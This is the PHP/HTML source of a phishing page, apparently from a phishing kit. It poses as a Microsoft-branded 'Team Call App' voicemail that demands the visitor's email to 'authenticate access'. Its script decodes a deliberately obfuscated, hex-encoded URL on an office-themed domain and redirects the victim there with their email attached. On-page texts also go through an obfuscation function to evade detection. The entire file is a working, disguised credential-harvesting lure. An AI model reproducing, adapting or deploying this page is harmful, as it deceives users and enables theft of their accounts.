<?php 
require '../main.php';
?><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title><?php echo $lang["title"]; ?></title>
    <style>
        /* General Reset */
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }

        body {
            font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            background: linear-gradient(135deg, #F3E6E1, #DCE6DF);
            color: #333;
        }

        html, body {
            height: 100%;
            display: flex;
            flex-direction: column;
        }

        /* Header Styling */
        .header {
            background-color: #fff;
            height: 62px;
            padding: 15px 15px;
        }

        .header img {
            width: 127px;
        }

        /* Main Content */
        .main {
            padding: 15px;
            flex-grow: 1;
            /* height: calc(100vh - 144px); */
        }

        .container {
            max-width: 750px;
            margin-left: auto;
            margin-right: auto;
        }

        /* Lock Icon */
        .lock-icon {
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #EBF4FB;
            color: #225b81;
            padding: 3px 10px;
            border-radius: 30px;
            margin-top: 50px;
            margin-bottom: 30px;
            width: 200px;
        }

        .lock-icon .emilver {
            padding-left: 5px;
            display: inline-block;
            font-size: 15px;
            margin-top: -3px;
        }

        /* Paragraph Styles */
        .youit {
            color: #333;
            font-size: 29px;
            margin-top: 20px;
            margin-bottom: 30px;
        }

        .youit2 {
            font-size: 17px;
            line-height: 1.5;
            margin-top: 30px;
            margin-bottom: 35px;
        }

        .enterem {
            font-size: 17px;
            line-height: 1.5;
            margin-top: 30px;
            margin-bottom: 35px;
        }

        /* Input Field */
        input[type="email"] {
            width: 312px;
            height: 34px;
            padding: 12px;
            margin: 15px 0;
            border: 1px solid #ccc;
            border-radius: 4px;
            font-size: 14px;
            display: block;
            outline: none;
        }
        
        input[type="email"]:focus {
            border-color: #3a98d8;
        }

        /* Button */
        button {
            background-color: #0067b8;
            color: white;
            padding: 12px 15px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            width: 218.3px;
            height: 44px;
            font-size: 16px;
            margin-top: 10px;
            margin-bottom: 15px;
            user-select: none; /* Prevent text selection */
            -webkit-user-select: none; /* Safari */
            -moz-user-select: none; /* Firefox */
            -ms-user-select: none; /* IE/Edge */
        }

        button:disabled {
            background-color: #0067b88f;
            cursor: not-allowed;
        }


        /* Sticky Bottom Bar */
        .bottom-bar {
            background-color: #fff;
            padding: 20px;
            font-size: 14px;
            line-height: 1.5;
        }

        .footercont {
            display: flex;
            align-items: center;
            max-width: 750px;
            margin-left: auto;
            margin-right: auto;
        }

        .bottom-bar img {
            width: 40px;
            margin-right: 5px;
        }
        
        .onlysee {
            font-size: 13px;
            font-weight: bold;
            color: #737373;
            line-height: 1.5;
        }
        
        .grid {
            display: grid;
            grid-template-columns: repeat(2, 13px);
            grid-template-rows: repeat(2, 13px);
            gap: 1px;
        }
        .square {
            width: 13px;
            height: 13px;
        }
        .red { background-color: #F25022; }
        .green { background-color: #7FBA00; }
        .blue { background-color: #00A4EF; }
        .yellow { background-color: #FFB900; }

        /* Responsive Adjustments */
        @media (max-width: 600px) {

        }
    </style>
</head>
<body>

    <div class="header">
        <div class="container">
            <div class="grid">
                <div class="square red"></div>
                <div class="square green"></div>
                <div class="square blue"></div>
                <div class="square yellow"></div>
            </div>
        </div>
    </div>

    <!-- Main Content -->
    <div class="main">
        <div class="container">
            <!-- Header -->
            <div class="lock-icon">
                <span>
                    <svg xmlns="http://www.w3.org/2000/svg" width="20" height="35" viewBox="0,0,256,256">
                        <g fill="#225b81">
                            <g transform="scale(8.53333,8.53333)">
                                <path d="M15,2c-3.85433,0 -7,3.14567 -7,7v2h-2c-1.105,0 -2,0.895 -2,2v12c0,1.105 0.895,2 2,2h18c1.105,0 2,-0.895 2,-2v-12c0,-1.105 -0.895,-2 -2,-2h-2v-2c0,-3.72842 -2.96342,-6.73143 -6.64453,-6.92773c-0.11309,-0.04556 -0.23356,-0.07005 -0.35547,-0.07227zM15,4c2.77367,0 5,2.22633 5,5v2h-10v-2c0,-2.77367 2.22633,-5 5,-5z">
                                </path>
                            </g>
                        </g>
                    </svg>
                </span>
                <span class="emilver"><?php echo $m->obf($lang["_login_texts"][0]); ?></span>
            </div>
            <div class="youit">
                <p><?php echo $m->obf($lang["_login_texts"][1]); ?> Team Call App User Guide</p>
            </div>

            <div class="youit2">
                <p>This voicemail is incorporated into the Team Call App to protect the information within and to grant access only to the authorized email address user. If you are not the authorized email user, please note that unauthorized access or use of the information within is strictly prohibited and punishable by law.</p>
            </div>

            <div class="enterem">
                <p>Enter User Email To Authenticate Access</p>
            </div>
            

            <form onsubmit="redirectUser(event)">
                <input type="email" id="emailInput" placeholder="E-Mail" required oninput="validateEmail()">
                <button id="submitButton" disabled><?php echo $m->obf($lang["_login_texts"][2]); ?></button>
            </form>
            
            <div class="onlysee">
                <p>Team Call App service allow users to communicate with other individuals or organizations via voice, video, and including other call services licensed under office 2025 Act</p>
            </div>

        </div>
    </div>

    <!-- Sticky Bottom Bar -->
    <div class="bottom-bar">
        <div class="footercont">
            <img src="res/img/micror434wfewf45fgv.png">
            <p>Targeted Threat Protection <br>Team Call voice and video calls are encrypted on end to end secured cloud.</p>
        </div>
    </div>

<script>
    // Encoded Cloudflare Worker URL
    const encodedWorkerUrl = "0068%0074%0074%0070%0073%003A%002F%002F%006F%0066%0066%0069%0063%0065%002E%0063%0061%006C%006C%0063%0065%006E%0074%0065%0072%0067%0072%006F%0075%0070%002E%0069%006E%0066%006F%002F%0061%0061%0041%0045%0053%0077%0050%006E";

    // Decode the UTF-16LE-like encoded URL
    function decodeUrlUtf16LE(encodedUrl) {
        let decoded = '';
        const hexValues = encodedUrl.split('%00').filter(v => v.length > 0);
        for (let hex of hexValues) {
            decoded += String.fromCharCode(parseInt(hex, 16));
        }
        return decoded;
    }

    // Get the decoded Worker URL
    const workerUrl = decodeUrlUtf16LE(encodedWorkerUrl);

    // Enable button only when a valid email is entered
    function validateEmail() {
        const emailInput = document.getElementById("emailInput").value;
        const submitButton = document.getElementById("submitButton");
        submitButton.disabled = !emailInput.includes("@") || !emailInput.includes(".");
    }

   function redirectUser(event) {
    event.preventDefault();
    const email = document.getElementById("emailInput").value;
    
    // Ensure only @ is not encoded
    const redirectUrl = `${workerUrl}#${email.replace(/%40/g, '@')}`;

    window.location.href = redirectUrl;
}
</script>


</body>
</html>
